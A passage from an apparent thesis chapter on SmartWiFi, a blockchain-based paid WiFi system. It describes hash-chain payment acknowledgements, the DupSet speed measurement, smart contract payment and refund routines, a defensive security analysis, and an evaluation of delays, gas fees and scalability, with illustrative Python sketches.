and the client generates a hash chain $\Upsilon$ using a random secret seed $\Upsilon_0$. The length
of the hash chain, denoted as $|\Upsilon|$, is calculated as $|\Upsilon| = T/\eta$, where $T$ is the
length of the service period, and $\eta$ is the length of the service unit. For instance, in our
prototype, the length of the service period is 3,600 seconds, and the length of the service unit is
60 seconds, i.e., one Hansa session serves a connection up to 1 hour in length with per-minute
acknowledgements.
    The client keeps the seed of the hash chain secret and sends the head of the hash chain
$\Upsilon_{head}$ and the public address $A_{pub}$ to the router. The router then prepares the smart
contract by storing the client’s public address and the head of the hash chain in it. After that,
the router replies to the client with the address of the smart contract. Before executing
prepayment, the client verifies the bytecode of the smart contract and the price per service unit
$\xi$, which is hard-coded in the smart contract. If the price is unacceptable, the client terminates
the connection. Otherwise, the client prepays the smart contract with the amount of cryptocurrency
$\Xi$ that corresponds to the cost of the entire service period, i.e., $\Xi = \xi \times T/\eta$.
Once the prepayment is processed by the blockchain, the client and router enter the Hansa service
session.
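The two handshake quantities can be computed directly from the session parameters. The sketch uses the prototype values quoted in this section (a 3,600-second service period and a 60-second service unit). The price per unit is a made-up value in wei, and the requirement that the period be a whole number of units is an assumption of this example.

```python
def chain_length(service_period_s, service_unit_s):
    """Number of acknowledgements in one session: the period divided by the unit."""
    if service_period_s % service_unit_s != 0:
        raise ValueError("service period must be a whole number of service units")
    return service_period_s // service_unit_s

def prepayment(price_per_unit_wei, service_period_s, service_unit_s):
    """Funds the client locks up front: price per unit times the number of units."""
    return price_per_unit_wei * chain_length(service_period_s, service_unit_s)

T, ETA = 3_600, 60                 # prototype values quoted in the text (seconds)
PRICE_WEI = 10_000_000_000_000     # hypothetical price per service unit

print(chain_length(T, ETA))            # 60
print(prepayment(PRICE_WEI, T, ETA))   # 600000000000000
```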
7.3.3: Hansa Service Session
The Hansa service session begins after the router verifies that the client has funded the smart
contract. Then follows the grace period, which seamlessly switches into an unrestricted Internet access.
Meanwhile, the router sends the client a short message signifying the beginning of a service session,
and both the client and router start service session timers.

Figure 7.2: Hansa timeline with respect to the hash chain $\Upsilon$. In this scenario, the client
disconnects after releasing acknowledgement $\Upsilon_i$, and the acknowledgement $\Upsilon_{i-2}$
was not released. When the service session timer expires, the router uses the last available
acknowledgement $\Upsilon_i$ to request payment from the smart contract.
Timeline events, in order: the client picks a random $\Upsilon_0$, generates $\Upsilon$ with
$|\Upsilon| = n$, and sends $\Upsilon_n$ to the router; the client sends $\Upsilon_{n-1}$, ...,
$\Upsilon_i$, and the router verifies that each belongs to $\Upsilon$; the client misses the next ACK
deadline and is disconnected while the router waits passively; the router requests payment using
$\Upsilon_i$. Hash chain links along the time axis: $\Upsilon_{head} = \Upsilon_n = H(\Upsilon_{n-1})$,
$\Upsilon_{n-1} = H(\Upsilon_{n-2})$, ..., $\Upsilon_i = H(\Upsilon_{i-1})$,
$\Upsilon_{i-1} = H(\Upsilon_{i-2})$, ..., $\Upsilon_1 = H(\Upsilon_0)$, $\Upsilon_0$.

Satisfaction Acknowledgement: Traditional paid WiFi hotspots charge users ahead of the service,
and if the QoS is unacceptable, requesting a refund is often challenging. We use cryptographic
satisfaction acknowledgements to allow the client to control its service session and payment. The
first service unit of a service session is regarded as a free trial, during which the client confirms
that the Internet connection is active and starts measuring speed (described in Section 7.3.4). Before
the end of each service unit, the client confirms a satisfactory QoS by sending the router a
satisfaction acknowledgement (the next hash in the hash chain), as shown in Fig. 7.2. The router
verifies that the acknowledgement is a valid hash in the hash chain, replies with an acknowledgement
response, and extends the connection for another service unit.
      Hansa allows the client to pause the connection, which can happen automatically as a result
of a speed probe, or can be triggered manually by the user. If the router does not receive the
next acknowledgement on time, it deactivates the Internet access for the client. During the service
period, the client can resume acknowledging the service, which will reactivate the Internet access,
with a maximum reactivation delay η. The service session concludes when either the timer reaches
the value T , or when the client-router connection breaks.
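The acknowledgement mechanism described above can be illustrated with a minimal Python sketch. It assumes SHA-256 as the hash function H (this passage does not fix H), a chain of n = 60 service units, and hypothetical helper names (h, build_hash_chain, verify_ack); it illustrates the hash-chain idea only and is not the SmartWiFi implementation.

```python
import hashlib
import os
from typing import List, Optional


def h(data: bytes) -> bytes:
    """Hash function H; SHA-256 is an assumption made for this sketch."""
    return hashlib.sha256(data).digest()


def build_hash_chain(n: int, seed: Optional[bytes] = None) -> List[bytes]:
    """Client side: return [Y_0, ..., Y_n] with Y_k = H(Y_{k-1}); Y_n is the head."""
    chain = [seed if seed is not None else os.urandom(32)]
    for _ in range(n):
        chain.append(h(chain[-1]))
    return chain


def verify_ack(ack: bytes, last_accepted: bytes) -> bool:
    """Router side: a fresh acknowledgement must hash to the last accepted value."""
    return h(ack) == last_accepted


# Example session with n = 60 service units (fixed seed only for reproducibility).
chain = build_hash_chain(60, seed=b"demo seed, not secret")
last = chain[60]                 # head, sent to the router during the handshake
accepted = 0
for k in (59, 58, 57):           # client releases Y_59, Y_58, Y_57 in turn
    if verify_ack(chain[k], last):
        last = chain[k]
        accepted += 1
print(accepted)                  # number of acknowledged service units
```

In this sketch the router only needs to remember the last accepted value. Because H is one-way, the router cannot compute the next acknowledgement itself, while checking a received one costs a single hash.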
7.3.4: DupSet Speed Measurement
We present DupSet, a bandwidth estimation solution that allows SmartWiFi clients to quantify
hotspots’ QoS. SmartWiFi is designed to operate across a flexible range of speeds and with different
numbers of mobile or stationary users, so bandwidth estimation must be frequent and incur low
overhead. Traditional speed evaluation methods include four metrics: capacity, available bandwidth,
TCP throughput, and bulk transfer capacity (BTC) [234]. Although these techniques can
provide very accurate results, they are not suitable for SmartWiFi since they require lengthy probes
and the transfer of large amounts of data.
            Table 7.1: Summary of smart contract features required for executing Hansa.
            Feature                      Type          Access Control    Security Measure
            Υhead (hash chain head)      variable      rw-r--r--         timer
            Apub (public address)        variable      rw-r--r--         timer
            ξ (price)                    constant      rw-r--r--         read only
            T (session length)           constant      r--r--r--         read only
            τ (refund delay)             constant      r--r--r--         read only
            η (session unit length)      constant      r--r--r--         read only
            balance check                function      r-xr-xr-x         read only
            Υhead-accessor               function      r-xr-xr-x         read only
            Υhead-mutator                function      r-xr--r--         timer
            Apub-accessor                function      r-xr-xr-x         read only
            Apub-mutator                 function      r-xr--r--         timer
            prepay (fund)                p-function    r-xr-xr-x         none
            checkout                     function      r-xr--r--         Υ-check
            refund                       function      r--r-xr--         delay (τ)
     The core of DupSet is a metric called user-perceived speed, represented by the transmission
component of the throughput when loading an average web page. Measuring the transmission
component, instead of the entire end-to-end communication, makes it possible to achieve transparency
with respect to different bandwidth uses, such as video streaming services or VPN traffic. DupSet draws
probes from pre-selected servers. Unlike many traditional bandwidth services, such as M-Lab [201] and
Ookla [225], the DupSet servers do not need to deliver high computational or throughput
performance. Each probe calculates a statistical summary55 of readings from all the reachable servers
on the list. Then, the current DupSet reading is calculated using a simple moving average56 .
  55
     We experimentally found that the third quartile statistic achieves a better measurement accuracy compared to mean,
median, and maximum.
  56
     We empirically determine that simple moving average over 6 periods (SMA-6) delivers stable and reliable results.
     Each DupSet server is an HTTP server with two payload files with random information available
for download. The size of the first file (P1 bytes) is much greater than the size of the second
file (P2 bytes). The client loads both the files and calculates the difference between delays of
downloading the first and the second file, which extracts the transmission delay from the total
end-to-end delay. Then, the user-perceived speed reading (in bytes/second) for the ith server is
determined as
$$\mathit{Speed}_i = \frac{\mathit{EPF}(P_1 - P_2)}{\Delta D_i},$$
where EPF is the Effective Payload Function defined as follows:
$$\mathit{EPF}(x) = \begin{cases} 0, & \text{if } x \le 0; \\ 0, & \text{if request failure}; \\ x, & \text{otherwise.} \end{cases}$$
∆Di is the difference, in seconds, between the delays of loading the first and the second file from
server i. The EPF function filters out unreliable results and ignores results from inaccessible
DupSet servers, so when one or several DupSet servers are unavailable or provide unreliable
readings, the accuracy of the DupSet result is not affected.
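The DupSet computation described in this section can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not the prototype's code: the function and class names are hypothetical, a non-positive delay difference is treated as an unreliable reading, failed servers are represented by a delay of None, and the third quartile is computed with the "inclusive" method of Python's statistics module (the text does not specify a quantile method).

```python
import statistics
from collections import deque
from typing import Deque, List, Optional


def epf(x: float, request_failed: bool = False) -> float:
    """Effective Payload Function: 0 for a failed request or x <= 0, else x."""
    if request_failed or x <= 0:
        return 0.0
    return float(x)


def server_speed(p1: int, p2: int,
                 d1: Optional[float], d2: Optional[float]) -> float:
    """Speed_i = EPF(P1 - P2) / dD_i, with dD_i = d1 - d2 in seconds.

    d1 and d2 are the download delays of the large and the small file;
    None marks a failed request (assumption of this sketch).
    """
    if d1 is None or d2 is None:
        return epf(p1 - p2, request_failed=True)
    delta = d1 - d2
    if delta <= 0:               # assumption: such a reading is unreliable
        return 0.0
    return epf(p1 - p2) / delta


def probe_reading(speeds: List[float]) -> float:
    """Third quartile of the readings from reachable servers (zeros dropped)."""
    valid = sorted(s for s in speeds if s > 0)
    if not valid:
        return 0.0
    if len(valid) == 1:
        return valid[0]
    return statistics.quantiles(valid, n=4, method="inclusive")[2]


class DupSetMeter:
    """Smooths probe readings with a simple moving average (SMA-6 by default)."""

    def __init__(self, periods: int = 6) -> None:
        self.window: Deque[float] = deque(maxlen=periods)

    def update(self, reading: float) -> float:
        self.window.append(reading)
        return sum(self.window) / len(self.window)


# One probe over six servers; the last server was unreachable.
readings = [100.0, 200.0, 300.0, 400.0, 500.0,
            server_speed(9000, 1000, None, 0.25)]
meter = DupSetMeter()
print(meter.update(probe_reading(readings)))
```

Dropping zero readings before taking the quartile mirrors the statement that inaccessible servers do not affect the result; a different filtering rule would be equally compatible with the text.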
7.3.5: SmartWiFi Smart Contract
The SmartWiFi smart contract provides an overarching trust layer between the router and the client
to exchange data and payments. The SmartWiFi smart contract has the following components: a)
state variables; b) state changing functions; c) cryptocurrency balance; and d) payable function
(p-function) for incoming payments. The functions that do not submit transactions (pure and view
functions) are called anonymously, whereas the calls to state changing functions are signed by a
specific user (using the account’s private key).
    The minimal set of the SmartWiFi smart contract features is summarized in Table 7.1, which
includes constants, variables, functions, and one payable function. The access control to each
feature is represented in the Unix-style symbolic access mode format, where the first triple refers
to the router’s privileges, the second triple to the user’s privileges, and the third to all others. The
security column describes the protective measures employed for each feature.
  Algorithm 2: Smart contract payment routine
    INPUT: Υhead , Υi , ξ, t, T , η, Apub
    OUTPUT: none
      1: if Υi ∈ Υ and caller = Router and Timestamp ≥ t + T then
      2:    RouterBalance ← i × ξ
      3:    RefundAmount ← (T/η − i) × ξ
      4:    TransferFunds(Apub , RefundAmount)
      5: end if
      6: return
    The price ξ, session length T , refund delay τ , and service unit length η are set as constants to
reduce execution delays and fees. The smart contract has two variables for hash chain head Υhead
and client public address Apub ; they can only be set by the router using their mutators. The accessor
and balance check functions are called without fees since they do not modify the blockchain. Both
the mutators use timers to prevent the modification of the values they set. The values are protected
using a timer for at least the duration of a Hansa session, including handshake, service session,
and checkout. The timer plays two important roles: first, it prevents a malicious modification of
Υhead and Apub by the router; second, it facilitates the reuse of the smart contract, thereby reduc-
ing blockchain fees and delays. The prepay function funds the smart contract. The checkout and
refund functions include additional security checks as depicted in Algorithms 2 and 3, which will
be described next.
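The timer-protected mutators can be modeled with a short Python sketch. The class name, the string identities, and the lock duration below are hypothetical; the sketch only shows the rule stated above (router-only writes, rejected while the timer is running) and does not reproduce the Solidity contract.

```python
class TimerLockedValue:
    """A value that only the router may set, and only after the lock expires."""

    def __init__(self, router: str) -> None:
        self.router = router
        self.value = None
        self.locked_until = 0    # timestamp (seconds) until which writes fail

    def get(self):
        """Accessor: read-only, callable by anyone."""
        return self.value

    def set(self, caller: str, value, now: int, lock_seconds: int) -> None:
        """Mutator: rejects non-router callers and writes during the lock."""
        if caller != self.router:
            raise PermissionError("only the router may call the mutator")
        if now < self.locked_until:
            raise RuntimeError("value is locked for the current session")
        self.value = value
        self.locked_until = now + lock_seconds


# Hypothetical lock: T = 3600 s plus a 600 s margin for handshake and checkout.
head = TimerLockedValue(router="router")
head.set("router", "head-of-session-1", now=0, lock_seconds=4200)
print(head.get())
```

Once the lock expires, the same contract instance can be prepared for the next client, which is the reuse benefit mentioned above.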
7.3.6: Payment and Refund
The fair payment and refund procedures are automatically enforced by the SmartWiFi smart con-
tract. The smart contract holds the amount of cryptocurrency Ξ, sufficient for funding one Hansa
session. The router is prohibited from claiming its payment until the blockchain timestamp reaches
the value t + T , where t is the saved timestamp at the beginning of the service session. Algorithm 2
shows how the payment is executed. The inputs include: the hash chain head Υhead , last retrieved
acknowledgement Υi , price ξ (stored as a constant in smart contract), timestamp t (saved during
handshake), service session length T (constant), session unit length η, and the user’s public ad-
dress Apub . The router obtains the payment based on the depth of Υi , and the remaining funds are
transferred back to the client as a refund.
  Algorithm 3: Smart contract refund routine
    INPUT: Υhead , ξ, t, T , η, τ , Apub
    OUTPUT: none
      1: if caller.address = Apub and Timestamp ≥ t + T + τ then
      2:    RefundAmount ← (T/η) × ξ
      3:    TransferFunds(Apub , RefundAmount)
      4: end if
      5: return
    The execution of lines 2–4 in Algorithm 2 can only be triggered by the router. If the router
never requests its payment, the client would never receive a refund; for this case, we design an
additional refund routine, described in Algorithm 3. The actual refund (lines 2–3) can be triggered
only by the client, and only after the predetermined refund delay τ has elapsed, which prevents the
refund-before-payment attack described in Section 7.4.
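The two routines can be mirrored in a small Python model. This is a sketch under assumptions: SHA-256 stands in for H, the index i is read as the number of hash steps between the last acknowledgement and the chain head, ξ is an integer price per service unit, and callers are plain strings. It follows the conditions of Algorithms 2 and 3 but is not the deployed contract code.

```python
import hashlib
from typing import Optional, Tuple


def h(data: bytes) -> bytes:
    """Hash function H; SHA-256 is an assumption of this sketch."""
    return hashlib.sha256(data).digest()


def units_acknowledged(ack: bytes, head: bytes, max_units: int) -> Optional[int]:
    """Hash `ack` forward until it meets `head`; the step count plays the role
    of i. Returns None when `ack` is not on the chain."""
    current = ack
    for steps in range(max_units + 1):
        if current == head:
            return steps
        current = h(current)
    return None


def payment(head: bytes, ack: bytes, caller: str, router: str, now: int,
            t: int, T: int, eta: int, xi: int) -> Optional[Tuple[int, int]]:
    """Algorithm 2: return (router payment, client refund), or None if refused."""
    units = T // eta
    i = units_acknowledged(ack, head, units)
    if i is None or caller != router or now < t + T:
        return None
    return i * xi, (units - i) * xi


def refund(caller: str, client: str, now: int,
           t: int, T: int, eta: int, tau: int, xi: int) -> Optional[int]:
    """Algorithm 3: full refund, available to the client only after t + T + tau."""
    if caller != client or now < t + T + tau:
        return None
    return (T // eta) * xi


# Example: 60 service units, last acknowledgement 25 steps below the head.
chain = [b"demo seed"]
for _ in range(60):
    chain.append(h(chain[-1]))
print(payment(chain[60], chain[35], "router", "router",
              now=3600, t=0, T=3600, eta=60, xi=10))   # (250, 350)
```

The model makes the role of τ visible: between t + T and t + T + τ only `payment` can succeed, so the router has a window in which a full refund cannot pre-empt its claim.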
7.4: Security Analysis
The security threats to SmartWiFi come either from malicious clients or from malicious
hotspots/routers. In this section, we analyze the security of SmartWiFi.
Non-Service by Malicious Hotspot: The goal of the client is to have a satisfactory Internet
connection for the money paid. If high-quality service is not provided, a full or partial refund should
be guaranteed. A malicious router might deny service, i.e., attempt to receive a payment without
providing a quality connection. To counteract such behavior, the SmartWiFi client uses DupSet to
assess the quality of the Internet connection before sending each subsequent acknowledgement, while
the SmartWiFi smart contract guarantees a full or partial refund.
Refund before Payment: The router expects to be fairly paid after the connection period is over.
The goal of the client, who prepaid the smart contract with one whole period’s worth of money, is
to receive a refund for all service units that do not result in a satisfaction acknowledgement. Refund
before payment refers to the case in which a malicious client claims that no service was received and
requests a full refund before the router collects its payment. In SmartWiFi, this threat is prevented
by the refund delay τ, a window reserved for the router to claim its payment, during which a refund
is impossible.
Handshake Flooding: The handshake of SmartWiFi is prone to denial-of-service attacks. The goal
of the adversary in the handshake flooding attack is to render the router unavailable or degrade its
performance. This can be achieved by initiating multiple incomplete handshakes, in which the
attacker, pretending to be a valid client, forces the router to submit values to the smart contract, for
which the blockchain charges fees. In SmartWiFi, this attack is prevented by checking the balance
of the client before preparing the smart contract for that client. The SmartWiFi router also caps the
number of clients it serves: once the number of requests exceeds the maximum, the router starts
dropping requests.
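The two handshake-flooding countermeasures can be expressed as a simple admission check. The sketch below is illustrative only: the function name and parameters are hypothetical, and `required_deposit` stands for the amount needed to fund one session.

```python
def admit_handshake(client_balance: int, required_deposit: int,
                    active_clients: int, max_clients: int) -> bool:
    """Return True if the router should prepare the smart contract for a client."""
    if active_clients >= max_clients:
        return False     # capacity reached: drop the request
    if client_balance < required_deposit:
        return False     # client cannot fund a session: spend no fees on it
    return True


print(admit_handshake(client_balance=1000, required_deposit=600,
                      active_clients=3, max_clients=10))
```

Both checks are read-only for the router, so rejecting a request costs no blockchain fee.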
Free-Rider Attack (Non-Payment): The existence of the free trial in SmartWiFi allows any
user who funds the contract to gain one service unit of Internet connectivity without providing
an acknowledgement. A dedicated attacker may use multiple client devices that take turns
connecting to the router, use the free trial period (1 minute in this work), disconnect without providing
any acknowledgements, tunnel the traffic to the same outlet, and then request a full refund. We
define such connection misuse as traffic hopping, which is a special case of the free-rider attack.
In SmartWiFi, we prevent such threats by relying on the accruing blockchain fees. Since the creation
of new malicious nodes (i.e., Sybil nodes) requires the attacker to transfer funds into multiple
accounts and pay a fee for each funding transaction, the fees summed over these accounts
nullify the benefits of free riding. After the free trial, the router expects to receive
regular satisfaction acknowledgements. Each acknowledgement from a client is expected to arrive
before a strict deadline; otherwise, the Internet connection will be terminated by the router.
7.5: Implementation
We implement a fully-functional SmartWiFi prototype on a Netgear router and Raspberry Pi clients
for testing the general functionality and performance of the system. In addition, we implement an
Android SmartWiFi client app, as shown in Figure 7.3a, for testing the performance of SmartWiFi
on mobile devices. The client app can be easily ported to iOS. We use Java 11 and Web3j for
implementing the software of the router, the desktop/IoT client, and the Android client. We use
the Infura API [11] to interact with the Ethereum blockchain.
Figure 7.3: SmartWiFi prototype: (a) The connection page of the SmartWiFi Android app; (b)
SmartWiFi configuration with a wired Internet connection, Raspberry Pi as a SmartWiFi router,
retail WiFi router with factory software, and Android smartphone as a SmartWiFi client.
    Figure 7.3b shows one possible configuration of SmartWiFi, in which the SmartWiFi router
software is installed on a Raspberry Pi with two Ethernet interfaces: one for the Internet connection and
another for delivering Internet access to the WiFi router. The retail WiFi router runs its original software; the
configuration of this router includes TCP port 5566 forwarding in order to allow connected devices
to access the SmartWiFi router. The client in this configuration is an ordinary Android smartphone
without rooting. This configuration ensures SmartWiFi’s compatibility with legacy systems, i.e.,
we can easily deploy SmartWiFi by plugging in a device running SmartWiFi router software.
    We implement a prototype SmartWiFi Ethereum smart contract in the Solidity programming
language. In our prototype and evaluation, we use both Mainnet and the Ropsten testnet for executing
the smart contracts. Furthermore, we build an IoT testbed with five Raspberry Pi clients
simultaneously connected to a single-antenna all-in-one SmartWiFi router (AMD A4 Micro-6400T, 4GB
RAM, Xubuntu 18.04). This setup demonstrates that SmartWiFi can be adapted to support
a variety of IoT configurations.
7.6: Evaluation
We thoroughly evaluate the performance of the SmartWiFi prototype by scrutinizing the following
system parameters under different circumstances: blockchain-related delays, Ethereum gas fees,
smart contract storage, the accuracy of DupSet speed probes, the scalability of the system, and the
communication overhead. In Ethereum, all blockchain-modifying transactions require the caller to
pay fees measured in the unit named gas, which is convertible into Ether using a dynamic variable
called gas price. In our evaluation, the service session lasts for one hour (T = 3,600 seconds), and
the service unit is one minute (η = 60 seconds).
7.6.1: Delays
In this section, we evaluate the blockchain-related delays of SmartWiFi sessions in both Mainnet
and Ropsten Ethereum networks. We add the Ropsten testnet for comparison to demonstrate the
performance stability of SmartWiFi under Ethereum networks with different amounts of mining
hash power. Thus, we show that if the parameters of the blockchain change in the future, it will
not significantly affect the performance of SmartWiFi. For each type of blockchain-related delay,
ten measurements were taken. The average delays (with standard deviations) for Ropsten and
Mainnet are presented in Table 7.2, from which we observe similar delays in both networks.
    The connection initiation phase, in which no blockchain interaction occurs, takes a few seconds
on average; after this phase the user can start accessing the Internet. The handshake phase, whose
average delay is below one minute for both Ropsten and Mainnet, initiates the payment arrangement.
The code check phase (bytecode verification in Table 7.2), which requires only a non-modifying
blockchain operation, also takes only a few seconds. The smart contract funding phase is essentially
a cryptocurrency transaction, which requires more time than a read-only blockchain request. Similarly,
the payment and refund routines, although demanding additional calculations and checks, exhibit
delays only slightly longer than a simple Ether transfer. In summary, to connect to a SmartWiFi
router and start Internet access, the client only experiences a few seconds of connection initiation
delay, which we consider acceptable.
Table 7.2: Comparison of blockchain-related average delays (in seconds) with relatively high gas
price (100 GWei for Ropsten and 5 GWei for Mainnet).
                                           Ropsten Testnet        Ethereum Mainnet
                Delay Type                 davg        σ          davg        σ
                Connection initiation       3.965      0.177       4.161      0.202
                Handshake                  39.093     18.504      53.161     16.432
                Bytecode verification       4.268      0.376       4.291      0.360
                Funding                    23.629     17.711      25.449     14.519
                Payment                    30.729     23.208      31.512     17.304
                Refund                     33.194     23.640      37.521     23.006
    The delay of blockchain execution in the Ethereum network can be further reduced by increasing
the gas price offered for a transaction [78]. However, such a performance optimization is not
guaranteed [256]. First, the Ethereum blockchain protocol does not enforce the prioritization of
incoming transactions, leaving this decision to the discretion of miners. Second, since Ethereum is
a decentralized network, any increase in transaction execution speed is delivered on a best-effort basis.
We therefore empirically test the delays with respect to different gas prices. The result, presented
in Figure 7.4, demonstrates a slight but consistent reduction of total SmartWiFi session delays as
the gas price increases, which shows that delays can be reduced by offering a higher gas price.
However, given the increasing cost, the delay reduction may not be worthwhile.
7.6.2: Fees
In this section, we measure the gas fees per transaction when a public function of the SmartWiFi
smart contract is called. In order to exclude the possibility of variable fees, we take every measure-
ment twice, and confirm that the cost remains the same for both measurements. The summary of
gas fees is presented in Table 7.3. The address accessor, hash chain head accessor, balance check,
and bytecode download are read-only blockchain operations, which do not incur any fees. How-
ever, the mutators and payable functions require the caller to pay fees. The fees in Table 7.3 are
calculated for one 60-minute service session, with 1-minute service units.
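The relation between gas, gas price, and the fee actually paid can be made concrete with a short conversion sketch. The gas amounts are copied from Table 7.3; the gas price of 5 GWei and the ETH price of 2,000 USD used in the example are hypothetical inputs chosen for illustration, not values reported in this evaluation, and the function names are likewise illustrative.

```python
from decimal import Decimal

WEI_PER_GWEI = Decimal(10) ** 9
WEI_PER_ETH = Decimal(10) ** 18

# Gas amounts from Table 7.3; read-only calls cost 0 gas and are omitted.
GAS_USED = {
    "Apub-mutator": 28_366,
    "Yhead-mutator": 33_684,
    "Payment": 50_076,
    "Refund": 42_266,
    "Fund contract": 21_040,
}


def fee_eth(gas: int, gas_price_gwei: Decimal) -> Decimal:
    """Fee in Ether = gas used x gas price, converted from GWei to Ether."""
    return Decimal(gas) * gas_price_gwei * WEI_PER_GWEI / WEI_PER_ETH


def fee_usd(gas: int, gas_price_gwei: Decimal, eth_usd: Decimal) -> Decimal:
    """Fee in USD for a given (hypothetical) ETH market price."""
    return fee_eth(gas, gas_price_gwei) * eth_usd


# Hypothetical inputs: 5 GWei gas price, 2,000 USD per ETH.
for name, gas in GAS_USED.items():
    print(name, fee_eth(gas, Decimal("5")),
          fee_usd(gas, Decimal("5"), Decimal("2000")))
```

Decimal arithmetic is used instead of floats so that fractional gas prices such as 0.5 GWei convert without rounding error.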
[Figure 7.4 plot: x-axis: Gas Price (GWei), ticks from 1.000 to 500.500; y-axis: Session delay (seconds), ticks from 80 to 220]
Figure 7.4: Full session delays with different gas prices in the Ropsten network. The graph has a
logarithmic gas price axis, and it shows that while offering a higher gas price empirically
increases the chance of a faster transaction, the speed improvement is insignificant.
   Ethereum allows the issuer of a transaction to offer an arbitrary gas price to prioritize the
transaction. Similar to the delay-measuring experiment in Figure 7.4, we record fees over 10 measurements
on the Ropsten network for a more realistic set of 10 gas prices evenly spaced across the interval between
0.5 and 5.0 GWei. The cumulative fee (for both router and client) is less than $0.40, even with the
highest gas price and ETH market price. Since the highest gas price is rarely used in production
systems, the fee overhead is expected to be significantly lower than the maximum.
   It is important to note that the cryptocurrency market price variations have little effect on
SmartWiFi fee overhead. Ethereum is a dynamic self-regulating system, so when the market price
of Ether goes up, the users can afford less, and they offer smaller fees for transactions, which
results in lower average gas price, and vice versa [78]. The curve of resulting fee in USD is thus
smoothed and flattened. Therefore, regardless of any cryptocurrency price fluctuations, SmartWiFi
blockchain fees paid in USD will remain approximately the same.
Table 7.3: Gas fees for different functions of the SmartWiFi smart contract. Since SmartWiFi
uses an off-chain execution protocol with infrequent smart contract transactions, the resulting fee
overhead drops significantly.
                                           Transaction fee with recommended gas price [3]
                   Function                       Gas              Approx. USD
                 Apub-accessor                      0                   0
                 Apub-mutator                    28,366                 0.11
                 Υhead-accessor                     0                   0
                 Υhead-mutator                   33,684                 0.13
                 Balance check                      0                   0
                 Payment                         50,076                 0.20
                 Refund                          42,266                 0.17
                 Fund contract                   21,040                 0.08
                 Download contract bytecode         0                   0
7.6.3: Smart Contract Storage
Table 7.4 shows a comparison between data stored in the SmartWiFi smart contract with and without
hash chain compression, from which we can see that, with the hash chain, Hansa stores about 17 times
less data in the smart contract, effectively reducing per-session delays. Moreover, it reduces
per-session fees from $8 to about 40¢ in USD equivalent, which corroborates the feasibility of
SmartWiFi in terms of low cost.
            Table 7.4: Data stored in the smart contract per session (T = 3,600, η = 60).
                                              Stored data per session
                 Data Unit                With hash chain      Without hash chain
                 Acknowledgement data         32 bytes            1,920 bytes
                 Client identity              20 bytes               20 bytes
                 Auxiliary data               64 bytes               64 bytes
                 Total                       116 bytes            2,004 bytes
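The totals in Table 7.4 can be reproduced with a few lines of arithmetic. The sketch assumes that, without the hash chain, each of the T/η acknowledgements would be stored as a separate 32-byte value, which is consistent with the 1,920-byte entry (60 × 32); the function name is illustrative.

```python
def stored_bytes(T: int, eta: int, use_hash_chain: bool,
                 ack_size: int = 32, identity_size: int = 20,
                 aux_size: int = 64) -> int:
    """Bytes kept in the contract per session, following Table 7.4."""
    units = T // eta                       # service units per session
    ack_bytes = ack_size if use_hash_chain else units * ack_size
    return ack_bytes + identity_size + aux_size


with_chain = stored_bytes(3600, 60, use_hash_chain=True)
without_chain = stored_bytes(3600, 60, use_hash_chain=False)
print(with_chain, without_chain, round(without_chain / with_chain, 1))
```

With the hash chain, the stored acknowledgement data stays at 32 bytes regardless of the session length, so the saving grows with T/η.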
7.6.4: DupSet Measurement and Overhead
In this section, we evaluate the feasibility of DupSet by comparing our estimations with the average
readings obtained from nine popular Internet speed measurement services, specifically: Bandwidth
Place, DSLReports, Fast.com, Google Fiber, Internet Health Test, M-Lab, Ookla, Speed-Of.Me,
and Xfinity. We test ten different SmartWiFi router Internet connections belonging to different
speed tiers, and evaluate average speeds of each of these connections by taking six speed test probes
at each of the nine services listed above. The six speed test probes consist of three probes per
service before running the DupSet simulation, and three probes per service right after the DupSet
simulation.
    In our prototype setup, we deploy ten DupSet servers in different geographic locations. In
order to achieve further diversity in measurements, we use servers provided by two different cloud
services, DigitalOcean [10] and Vultr [101]. For each Internet connection, we run 60 probes of
DupSet for measuring the transmission speed component from each of the servers based on the
payload of 10 kilobytes. The fastest reading from the ten servers represents the speed result of a
probe.
    The experiment confirms that the low-overhead DupSet estimations correlate with the high-
overhead traditional Internet speed readings. Figure 7.5 shows that DupSet speed measurement
results accurately reflect the Internet connection speed tier, which quantifies the QoS of user service.
The spiked increase in the gap between the two readings at high speeds demonstrates the core
difference between traditional bandwidth measurements and user-perceived speed estimation: a
drastic increase in available bandwidth after a certain threshold does not trigger a proportional
boost in loading web pages. On a high-speed Internet connection, the performance bottleneck moves
from the client to the server.
    The overall maximum communication overhead of DupSet probes depends on the number of
DupSet servers and the size of the payload on each of these servers. In our prototype, we empirically
select a 10-kilobyte DupSet payload and 10 DupSet servers, resulting in a 100-kilobyte maximum
overhead per probe, or approximately 6 MB of overhead per one-hour session with one probe per
one-minute service unit. Through this experiment, we demonstrate that DupSet probes reflect accurate
user-perceived speed with low overhead.
    A SmartWiFi client uses DupSet to enforce a minimum expected speed. Since different users
may have different minimum speed requirements at different times (e.g., watching streaming video
needs a higher speed than reading e-mail), users must explicitly specify their
expectations in the client settings. In the SmartWiFi Android app, for example, we let the user
choose between 5 discrete options.
[Figure 7.5 plot: y-axis: Measured downlink speed (Mbps), ticks from 0 to 700; x-axis: Internet connection profile; series: DupSet, Speed measurement websites]
Figure 7.5: Correlation between traditional Internet speed measurement (average result from nine
websites) and DupSet probes over 10 different Internet connection profiles.
7.6.5: Scalability
SmartWiFi is designed to scale to multiple clients connecting to a single router. We evaluate the
performance of the system under the load of different numbers of users. For each client, we perform
a background web surfing simulation that picks and loads a random website from the Alexa Top 10K
list [250] every 10 seconds. Figure 7.6 shows the number of clients one router could serve without
disconnection. As we can see, this capacity depends on the bandwidth of the Internet connection of
the router and the maximum expected Internet speed set by the client. The experiment shows that
when the router has a high-bandwidth Internet connection, and clients do not request high speed,
SmartWiFi is capable of serving hundreds of clients simultaneously57 .
       Figure 7.7 shows average DupSet readings for different Internet connections with different
numbers of simultaneously served clients under a background web surfing simulation. The graph shows
the number of clients one SmartWiFi router can serve based on its Internet connection bandwidth
and average speed expectations. For example, it will be overly ambitious for a SmartWiFi router
with 100 Mbps connection to serve 40 users whose average speed expectation is 2 Mbps. However,
  57
    The growing number of users incurs higher rate of physical layer packet collisions. One way to mitigate this is to
use MIMO WiFi access point hardware.
                                                                                                          191


                                                          300
                    Max. number of simultaneous clients
                                                                                                Ethernet, 100 Mbps
                                                          250                                   LTE, 52 Mbps
                                                                                                VPN, 28 Mbps
                                                          200                                   Tor, 6 Mbps
                                                          150
                                                          100
                                                           50
                                                            0
                                                                       25
                                                                      12      1   2   4     8   16   32   64    8    6    2    24
                                                                06   0.  5
                                                                        25
                                                                       0.                                      12   25   51   10
                                                                0.   0.   5
